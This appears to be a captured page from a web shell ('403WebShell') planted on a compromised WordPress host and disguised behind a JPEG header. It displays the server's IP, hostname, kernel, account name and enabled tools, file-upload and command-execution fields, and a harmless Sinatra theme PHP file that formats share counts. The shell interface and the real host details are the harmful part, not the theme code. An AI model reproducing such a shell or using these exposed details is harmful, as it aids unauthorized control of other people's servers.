????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.96.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/cwd/wp-content/themes/sinatra/inc/compatibility/socialsnap/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/wp-content/themes/sinatra/inc/compatibility/socialsnap/socialsnap-functions.php
<?php
/**
 * Sinatra Social Snap compatibility functions.
 *
 * @package     Sinatra
 * @author      Sinatra Team <[email protected]>
 * @since       1.1.0
 */

if ( ! function_exists( 'sinatra_entry_meta_shares' ) ) :
	/**
	 * Add share count information to entry meta.
	 *
	 * @since 1.1.0
	 */
	function sinatra_entry_meta_shares() {

		$share_count = socialsnap_get_total_share_count();

		// Icon.
		$icon = sinatra()->icons->get_meta_icon( 'share', sinatra()->icons->get_svg( 'share-2', array( 'aria-hidden' => 'true' ) ) );

		$output = sprintf(
			'<span class="share-count">%3$s%1$s %2$s</span>',
			socialsnap_format_number( $share_count ),
			esc_html( _n( 'Share', 'Shares', $share_count, 'sinatra' ) ),
			$icon
		);

		echo wp_kses( apply_filters( 'sinatra_entry_share_count', $output ), sinatra_get_allowed_html_tags() );
	}
endif;

Youez - 2016 - github.com/yon3zu
LinuXploit